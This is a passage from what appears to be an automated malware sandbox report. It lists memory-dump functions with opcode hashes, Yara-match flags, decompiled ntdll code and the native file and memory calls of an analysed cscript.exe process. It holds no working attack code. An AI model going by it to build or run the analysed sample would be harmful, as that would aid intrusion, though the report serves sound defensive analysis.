                                  • Instruction Fuzzy Hash: 0A90026260500402D14171E964287160015A7D0341F51D011A0014558DC6D98A5576E1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 019FA770, Relevance: .0, Instructions: 4COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.308202420.0000000001990000.00000040.00000001.sdmp, Offset: 01990000, based on PE: true
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: b7bbb281ae26e1dfaef8ac9accfd31bc0798c27e8d0e5461533f0787e894260d
                                  • Instruction ID: cf250af8d9b5801880c04af3545638538634e7d00ada613b437ae6c7f7aebfe9
                                  • Opcode Fuzzy Hash: b7bbb281ae26e1dfaef8ac9accfd31bc0798c27e8d0e5461533f0787e894260d
                                  • Instruction Fuzzy Hash: 2B90027620504442D50165E96814A970005A7D0345F51D411A041459CDC6D48861B161
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 019F9770, Relevance: .0, Instructions: 4COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.308202420.0000000001990000.00000040.00000001.sdmp, Offset: 01990000, based on PE: true
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: f1d473989d3647a4be41e1bc128ff7508dfba1df9570c309e3b641c7e35e7c79
                                  • Instruction ID: dbb45f2374e5ddd36df0af79a584563052392562cd8f0b35a35fae480f4b908b
                                  • Opcode Fuzzy Hash: f1d473989d3647a4be41e1bc128ff7508dfba1df9570c309e3b641c7e35e7c79
                                  • Instruction Fuzzy Hash: CF90026220504442D10165E96418A160005A7D0345F51D011A1054599DC6B58851B171
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 019F9760, Relevance: .0, Instructions: 4COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.308202420.0000000001990000.00000040.00000001.sdmp, Offset: 01990000, based on PE: true
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: b443a7e1680c9c4a925c22d25505ec563280442155369c16c6d8186b483b715f
                                  • Instruction ID: 47ef662e7f8b367a29ad5cdfd096d15b047fc9848d5685adac30b961db7fb354
                                  • Opcode Fuzzy Hash: b443a7e1680c9c4a925c22d25505ec563280442155369c16c6d8186b483b715f
                                  • Instruction Fuzzy Hash: 5690027220100403D10161E965187170005A7D0341F51D411A041455CDD6D688517161
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 019F96D0, Relevance: .0, Instructions: 4COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.308202420.0000000001990000.00000040.00000001.sdmp, Offset: 01990000, based on PE: true
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 8cf03d3773f69624d23c695726a37733a3cf4beded16c58cc325ae165dcf08a3
                                  • Instruction ID: fbab69b7b85db64071730ca561273a58409ea7da915a7f58bc358f821a5f2d3d
                                  • Opcode Fuzzy Hash: 8cf03d3773f69624d23c695726a37733a3cf4beded16c58cc325ae165dcf08a3
                                  • Instruction Fuzzy Hash: 7090027220100842D10161E95414B560005A7E0341F51C016A0114658DC695C8517561
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 019F9610, Relevance: .0, Instructions: 4COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.308202420.0000000001990000.00000040.00000001.sdmp, Offset: 01990000, based on PE: true
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 4e4bbae7903462d3809d98f74f1f59ea0bf8c0f92b8f67c28f287236b6dd000c
                                  • Instruction ID: 37c267dc45b762bdcdb18c552bece351f2d7ccb0ecacc9cd4a48ab2f6cb38b40
                                  • Opcode Fuzzy Hash: 4e4bbae7903462d3809d98f74f1f59ea0bf8c0f92b8f67c28f287236b6dd000c
                                  • Instruction Fuzzy Hash: AE90027260500802D15171E954247560005A7D0341F51C011A0014658DC7D58A5576E1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 019F9650, Relevance: .0, Instructions: 4COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.308202420.0000000001990000.00000040.00000001.sdmp, Offset: 01990000, based on PE: true
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: aa2ff945040e2b28c91e2a8da68f206eae94a3b2c77188c869e68fa27d576f97
                                  • Instruction ID: e40e055a7fcb5db66a9b017a8a3edcb18ec7d09762c5d364aeb3b5ed2b4f72fd
                                  • Opcode Fuzzy Hash: aa2ff945040e2b28c91e2a8da68f206eae94a3b2c77188c869e68fa27d576f97
                                  • Instruction Fuzzy Hash: BF90027220504842D14171E95414A560015A7D0345F51C011A0054698DD6A58D55B6A1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 019F9670, Relevance: .0, Instructions: 2COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.308202420.0000000001990000.00000040.00000001.sdmp, Offset: 01990000, based on PE: true
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                  • Instruction ID: 218667d15e3643d0ff191de9174fdd0dab3935863ff56486c230f89e3b48fb3d
                                  • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                  • Instruction Fuzzy Hash:
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 01A4FDDA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 53%
                                  			E01A4FDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E019FCE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E01A45720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E01A45720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}










                                  0x01a4fdda
                                  0x01a4fde2
                                  0x01a4fde5
                                  0x01a4fdec
                                  0x01a4fdfa
                                  0x01a4fdff
                                  0x01a4fe0a
                                  0x01a4fe0f
                                  0x01a4fe17
                                  0x01a4fe1e
                                  0x01a4fe19
                                  0x01a4fe19
                                  0x01a4fe19
                                  0x01a4fe20
                                  0x01a4fe21
                                  0x01a4fe22
                                  0x01a4fe25
                                  0x01a4fe40

                                  APIs
                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01A4FDFA
                                  Strings
                                  • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 01A4FE01
                                  • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 01A4FE2B
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.308202420.0000000001990000.00000040.00000001.sdmp, Offset: 01990000, based on PE: true
                                  Similarity
                                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                  • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                  • API String ID: 885266447-3903918235
                                  • Opcode ID: a316eb0a9daf34c14d2a34b0f0964cb1e41a90c1e00277554462409966b0c214
                                  • Instruction ID: 3e8f8afa15e3c35e0773a2b402c072bcd53cc608ca8393ae6fb928a84b580b58
                                  • Opcode Fuzzy Hash: a316eb0a9daf34c14d2a34b0f0964cb1e41a90c1e00277554462409966b0c214
                                  • Instruction Fuzzy Hash: 5EF0F672640201BFEA201B49DD02F23BF6AEBC4B30F144318F628565D1DA62F82087F0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Analysis Process: cscript.exe PID: 6536 Parent PID: 3472 cscript.exeCOMMON

                                  Executed Functions

                                  Function 0061870C, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45nativefileCOMMON
                                  Download Yara Rule
                                  APIs
                                  • NtReadFile.NTDLL(?,?,FFFFFFFF,?,?,?,?,?,1:a,FFFFFFFF,?,r=a,?,00000000), ref: 006186D5
                                  • NtClose.NTDLL(P=a,?,?,00613D50,00000000,FFFFFFFF), ref: 00618735
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.499680776.0000000000600000.00000040.00020000.sdmp, Offset: 00600000, based on PE: false
                                  Yara matches
                                  Similarity
                                  • API ID: CloseFileRead
                                  • String ID: P=a
                                  • API String ID: 752142053-3282104018
                                  • Opcode ID: 0d24d278059620e815b43ad25f047fdd73d2e6c9f4eeb68bd90787b8b3011962
                                  • Instruction ID: 5889f5f769e160cf78f7d467e4ff640e0232ef1a921d41f9dee07909f168b52d
                                  • Opcode Fuzzy Hash: 0d24d278059620e815b43ad25f047fdd73d2e6c9f4eeb68bd90787b8b3011962
                                  • Instruction Fuzzy Hash: 8AF03CB6204108ABC714EF98DC85DEB77ADEF8C350F148658FA1C97201C630EA518BE0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 006185E0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40filenativeCOMMON
                                  Download Yara Rule
                                  APIs
                                  • NtCreateFile.NTDLL(00000060,00000000,.z`,00613BB7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00613BB7,007A002E,00000000,00000060,00000000,00000000), ref: 0061862D
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.499680776.0000000000600000.00000040.00020000.sdmp, Offset: 00600000, based on PE: false
                                  Yara matches
                                  Similarity
                                  • API ID: CreateFile
                                  • String ID: .z`
                                  • API String ID: 823142352-1441809116
                                  • Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                  • Instruction ID: a1781c82fa8840eaec4f9ab0fa4eaefd4d9e6ba9cbd3ed1fe38da9a03d8a495a
                                  • Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                  • Instruction Fuzzy Hash: 24F0BDB2204208ABCB48CF89DC95EEB77ADAF8C754F158248FA0D97241C630E851CBA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 006185DA, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 38filenativeCOMMON
                                  Download Yara Rule
                                  APIs
                                  • NtCreateFile.NTDLL(00000060,00000000,.z`,00613BB7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00613BB7,007A002E,00000000,00000060,00000000,00000000), ref: 0061862D
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.499680776.0000000000600000.00000040.00020000.sdmp, Offset: 00600000, based on PE: false
                                  Yara matches
                                  Similarity
                                  • API ID: CreateFile
                                  • String ID: .z`
                                  • API String ID: 823142352-1441809116
                                  • Opcode ID: 376b76feb21824fa48789a8f80c8a437da893c14e663adeb08cbf43f4dd1fed7
                                  • Instruction ID: a68fc28848306ade3778f8a757e12cec5c298d1cb2fe190bed04faf2475e6b5c
                                  • Opcode Fuzzy Hash: 376b76feb21824fa48789a8f80c8a437da893c14e663adeb08cbf43f4dd1fed7
                                  • Instruction Fuzzy Hash: 49F019B6204188ABCB08CF98D885CEB77A9EF8C350B15864DF90D93202C634E851CBA0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00618690, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 36filenativeCOMMON
                                  Download Yara Rule
                                  APIs
                                  • NtReadFile.NTDLL(?,?,FFFFFFFF,?,?,?,?,?,1:a,FFFFFFFF,?,r=a,?,00000000), ref: 006186D5
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.499680776.0000000000600000.00000040.00020000.sdmp, Offset: 00600000, based on PE: false
                                  Yara matches
                                  Similarity
                                  • API ID: FileRead
                                  • String ID: 1:a
                                  • API String ID: 2738559852-3321157890
                                  • Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                  • Instruction ID: 7ea71cd326acf2e8c97840684ab2ebc87ee1be6c073fac9550cf62ca3f73145d
                                  • Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                  • Instruction Fuzzy Hash: D9F0A4B2200208ABCB14DF89DC95EEB77ADAF8C754F158248BA1D97241D630E951CBA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00618710, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 20nativeCOMMON
                                  Download Yara Rule
                                  APIs
                                  • NtClose.NTDLL(P=a,?,?,00613D50,00000000,FFFFFFFF), ref: 00618735
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.499680776.0000000000600000.00000040.00020000.sdmp, Offset: 00600000, based on PE: false
                                  Yara matches
                                  Similarity
                                  • API ID: Close
                                  • String ID: P=a
                                  • API String ID: 3535843008-3282104018
                                  • Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                  • Instruction ID: 3173affc9ceda7940ba423c8ebd81e142da28421744d880b2c3d6d5c584a73d7
                                  • Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                  • Instruction Fuzzy Hash: 8DD01776200214BBD710EB99CC8AEE77BADEF48760F154499BA189B242C530FA40C6E0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 006187C0, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                  Download Yara Rule
                                  APIs
                                  • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00602D11,00002000,00003000,00000004), ref: 006187F9
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.499680776.0000000000600000.00000040.00020000.sdmp, Offset: 00600000, based on PE: false
                                  Yara matches
                                  Similarity
                                  • API ID: AllocateMemoryVirtual
                                  • String ID:
                                  • API String ID: 2167126740-0
                                  • Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                  • Instruction ID: 8ce824e0d6febe892b93c5882f1ae8b71c3aae94082c458567733db680103af1
                                  • Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                  • Instruction Fuzzy Hash: 61F015B2200208ABCB14DF89CC81EEB77ADAF88750F158148FE0897241C630F910CBB4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 006187BA, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                  Download Yara Rule
                                  APIs
                                  • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00602D11,00002000,00003000,00000004), ref: 006187F9
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.499680776.0000000000600000.00000040.00020000.sdmp, Offset: 00600000, based on PE: false
                                  Yara matches
                                  Similarity
                                  • API ID: AllocateMemoryVirtual
                                  • String ID:
                                  • API String ID: 2167126740-0
                                  • Opcode ID: 51c6d38799eb268339bbd3e0212be234a1c0dc86b54acad45c80b6b8f55061c8
                                  • Instruction ID: 6f2c13684154f158ff7f136bb576f3926862db2f4fc764ec24e899ff73699062
                                  • Opcode Fuzzy Hash: 51c6d38799eb268339bbd3e0212be234a1c0dc86b54acad45c80b6b8f55061c8
                                  • Instruction Fuzzy Hash: 51F0F2B6204209ABCB14DF89DC85EEB77A9AF88354F158658FE0897241C630E910CBE0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 047B9540, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.503908034.0000000004750000.00000040.00000001.sdmp, Offset: 04750000, based on PE: true
                                  • Associated: 00000010.00000002.506549814.000000000486B000.00000040.00000001.sdmp Download File
                                  • Associated: 00000010.00000002.506569206.000000000486F000.00000040.00000001.sdmp Download File
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 3effe4eb6e29522976444f54f26212e990d4b17d99a8ee6de5fcdcd0c6528b7e
                                  • Instruction ID: 8eeeab172788e2349b7d5cca996a8edc8268645d6ce0f33813dde3fc3ea2ea4b
                                  • Opcode Fuzzy Hash: 3effe4eb6e29522976444f54f26212e990d4b17d99a8ee6de5fcdcd0c6528b7e
                                  • Instruction Fuzzy Hash: F5900265211000072225A5590704507004697D9395351C039F10065A0CD661D8657161
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 047B95D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.503908034.0000000004750000.00000040.00000001.sdmp, Offset: 04750000, based on PE: true
                                  • Associated: 00000010.00000002.506549814.000000000486B000.00000040.00000001.sdmp Download File
                                  • Associated: 00000010.00000002.506569206.000000000486F000.00000040.00000001.sdmp Download File
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 91e8079fa14b1e9541cb403dfca58a2c14f5b6a5e09e99d87c60451fe5c58820
                                  • Instruction ID: d4ffcbddf5567a0ad05e0088a5a09573c7925b5221b713409962b18847dcf401
                                  • Opcode Fuzzy Hash: 91e8079fa14b1e9541cb403dfca58a2c14f5b6a5e09e99d87c60451fe5c58820
                                  • Instruction Fuzzy Hash: 369002A120200007622571594414616400A97E4345B51C039E10055E0DC565D8957165
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 047B9660, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.503908034.0000000004750000.00000040.00000001.sdmp, Offset: 04750000, based on PE: true
                                  • Associated: 00000010.00000002.506549814.000000000486B000.00000040.00000001.sdmp Download File
                                  • Associated: 00000010.00000002.506569206.000000000486F000.00000040.00000001.sdmp Download File
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: b69ca82761dcde6467096ba7509e431e72b2aa9c1221265620ae7c5ca1273a2c
                                  • Instruction ID: e2ebc6d13ddd2c3555b0d5b6ace76b16ab4ce6502b7bdddd9427041e2d62a840
                                  • Opcode Fuzzy Hash: b69ca82761dcde6467096ba7509e431e72b2aa9c1221265620ae7c5ca1273a2c
                                  • Instruction Fuzzy Hash: 6790027120100806F2A07159440464A000597D5345F91C03DA00166A4DCA55DA5D77E1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 047B9650, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.503908034.0000000004750000.00000040.00000001.sdmp, Offset: 04750000, based on PE: true
                                  • Associated: 00000010.00000002.506549814.000000000486B000.00000040.00000001.sdmp Download File
                                  • Associated: 00000010.00000002.506569206.000000000486F000.00000040.00000001.sdmp Download File
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: cdcd8d0244fdd1a29821718e01b3064bb792e82d92a7ac5fbe4eafa21fad8e4c
                                  • Instruction ID: e2e659e8be762d2ef066e00ee404ecb686c7345785f027bb2597cbe02a6b9e1f
                                  • Opcode Fuzzy Hash: cdcd8d0244fdd1a29821718e01b3064bb792e82d92a7ac5fbe4eafa21fad8e4c
                                  • Instruction Fuzzy Hash: 7190027120504846F26071594404A46001597D4349F51C039A00556E4D9665DD59B6A1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 047B96E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.503908034.0000000004750000.00000040.00000001.sdmp, Offset: 04750000, based on PE: true
                                  • Associated: 00000010.00000002.506549814.000000000486B000.00000040.00000001.sdmp Download File
                                  • Associated: 00000010.00000002.506569206.000000000486F000.00000040.00000001.sdmp Download File
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 12f35ea6544bb0a5e21d2814312e2a62e02a261673e83c16b96961b14fcf0ff0
                                  • Instruction ID: 69e44f6e7817ab99bfd65daee97e561c2abcdafa27927e0766b356fc56997998
                                  • Opcode Fuzzy Hash: 12f35ea6544bb0a5e21d2814312e2a62e02a261673e83c16b96961b14fcf0ff0
                                  • Instruction Fuzzy Hash: B590027120108806F2306159840474A000597D4345F55C439A44156A8D86D5D8957161
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 047B96D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.503908034.0000000004750000.00000040.00000001.sdmp, Offset: 04750000, based on PE: true
                                  • Associated: 00000010.00000002.506549814.000000000486B000.00000040.00000001.sdmp Download File
                                  • Associated: 00000010.00000002.506569206.000000000486F000.00000040.00000001.sdmp Download File
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: afec0b7b4e418dfff8833b4baa3d8fdddfaef65b9a915050b3a76f04e7b8716a
                                  • Instruction ID: 3c2d8747ff6214a4a5484eb0a2b47070ed965d269f0c072d0aa4274c7b6b05e9
                                  • Opcode Fuzzy Hash: afec0b7b4e418dfff8833b4baa3d8fdddfaef65b9a915050b3a76f04e7b8716a
                                  • Instruction Fuzzy Hash: 3390027120100846F22061594404B46000597E4345F51C03EA01156A4D8655D8557561
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 047B9710, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.503908034.0000000004750000.00000040.00000001.sdmp, Offset: 04750000, based on PE: true
                                  • Associated: 00000010.00000002.506549814.000000000486B000.00000040.00000001.sdmp Download File
                                  • Associated: 00000010.00000002.506569206.000000000486F000.00000040.00000001.sdmp Download File
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 1442d9db6974fb48e970959a9e1f81ff37497a2f4d8a8f9b0a49329c0a5caae7
                                  • Instruction ID: 6989424da6f28c5472c0dacbf2ac913bffd7981ab99aff1d4b6c18d6d19873ab
                                  • Opcode Fuzzy Hash: 1442d9db6974fb48e970959a9e1f81ff37497a2f4d8a8f9b0a49329c0a5caae7
                                  • Instruction Fuzzy Hash: 4890027120100406F22065995408646000597E4345F51D039A50155A5EC6A5D8957171
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 047B9FE0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.503908034.0000000004750000.00000040.00000001.sdmp, Offset: 04750000, based on PE: true
                                  • Associated: 00000010.00000002.506549814.000000000486B000.00000040.00000001.sdmp Download File
                                  • Associated: 00000010.00000002.506569206.000000000486F000.00000040.00000001.sdmp Download File
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: c0a42f36252e33139bc4303175da588a79b8875d14e7f8444dba93a8f6c64862
                                  • Instruction ID: 7551ae081f286ee279f1efb6b8fea765a1a778bc881579e7c25a21876e51fabe
                                  • Opcode Fuzzy Hash: c0a42f36252e33139bc4303175da588a79b8875d14e7f8444dba93a8f6c64862
                                  • Instruction Fuzzy Hash: C990027131114406F23061598404706000597D5345F51C439A08155A8D86D5D8957162
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 047B9780, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.503908034.0000000004750000.00000040.00000001.sdmp, Offset: 04750000, based on PE: true
                                  • Associated: 00000010.00000002.506549814.000000000486B000.00000040.00000001.sdmp Download File
                                  • Associated: 00000010.00000002.506569206.000000000486F000.00000040.00000001.sdmp Download File
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: d404328e1fac90a21f31535b6a7c40d3b59b6155e63acaaf00ee8134cb2f1bdd
                                  • Instruction ID: 1005f62b04cf3aaa6a9397fcf714a4b7299d8b4653b954a05ec20eb06e4143f9
                                  • Opcode Fuzzy Hash: d404328e1fac90a21f31535b6a7c40d3b59b6155e63acaaf00ee8134cb2f1bdd
                                  • Instruction Fuzzy Hash: C290026921300006F2A07159540860A000597D5346F91D43DA00065A8CC955D86D7361
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 047B9860, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.503908034.0000000004750000.00000040.00000001.sdmp, Offset: 04750000, based on PE: true
                                  • Associated: 00000010.00000002.506549814.000000000486B000.00000040.00000001.sdmp Download File
                                  • Associated: 00000010.00000002.506569206.000000000486F000.00000040.00000001.sdmp Download File
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 00c25af6749c89b523f7455f70035bf495205d305c1593a633d922e4cc807482
                                  • Instruction ID: e77b979688f1feee50f5fec36fbc7cf681c60d56ffe5356ca6e197eb9435d00b
                                  • Opcode Fuzzy Hash: 00c25af6749c89b523f7455f70035bf495205d305c1593a633d922e4cc807482
                                  • Instruction Fuzzy Hash: 9190027120100417F23161594504707000997D4385F91C43AA04155A8D9696D956B161
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 047B9840, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.503908034.0000000004750000.00000040.00000001.sdmp, Offset: 04750000, based on PE: true
                                  • Associated: 00000010.00000002.506549814.000000000486B000.00000040.00000001.sdmp Download File
                                  • Associated: 00000010.00000002.506569206.000000000486F000.00000040.00000001.sdmp Download File
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: d4fa3fe33db87e8b1155c966a349d59182bb1f10d5b5cd4691665ca562ae9f81
                                  • Instruction ID: 4f33af5d050b049c29169f031480c2242ccbf13e9cd98cdf982ee65a00bda5ee
                                  • Opcode Fuzzy Hash: d4fa3fe33db87e8b1155c966a349d59182bb1f10d5b5cd4691665ca562ae9f81
                                  • Instruction Fuzzy Hash: A2900261242041567665B15944045074006A7E4385791C03AA14059A0C8566E85AF661
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 047B9910, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.503908034.0000000004750000.00000040.00000001.sdmp, Offset: 04750000, based on PE: true
                                  • Associated: 00000010.00000002.506549814.000000000486B000.00000040.00000001.sdmp Download File
                                  • Associated: 00000010.00000002.506569206.000000000486F000.00000040.00000001.sdmp Download File
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 01051418792a5e0a9ee498ba04e718984275a21a6c6af7c93ae3ece6e045a404
                                  • Instruction ID: f5d6b897c64e1a5fb6e9eaf61557e18b5e21e70d2545d8467cef383f00e65518
                                  • Opcode Fuzzy Hash: 01051418792a5e0a9ee498ba04e718984275a21a6c6af7c93ae3ece6e045a404
                                  • Instruction Fuzzy Hash: F29002B120100406F26071594404746000597D4345F51C039A50555A4E8699DDD976A5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 047B99A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.503908034.0000000004750000.00000040.00000001.sdmp, Offset: 04750000, based on PE: true
                                  • Associated: 00000010.00000002.506549814.000000000486B000.00000040.00000001.sdmp Download File
                                  • Associated: 00000010.00000002.506569206.000000000486F000.00000040.00000001.sdmp Download File
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: e42f135b1bf86386c5c3d7f41aebfc538b495ced4e1691fd485fa03a807888d8
                                  • Instruction ID: 5a8412f7eb02f746a936e595757ed8cf730d8cabeea359221aa7f96aa2213bbd
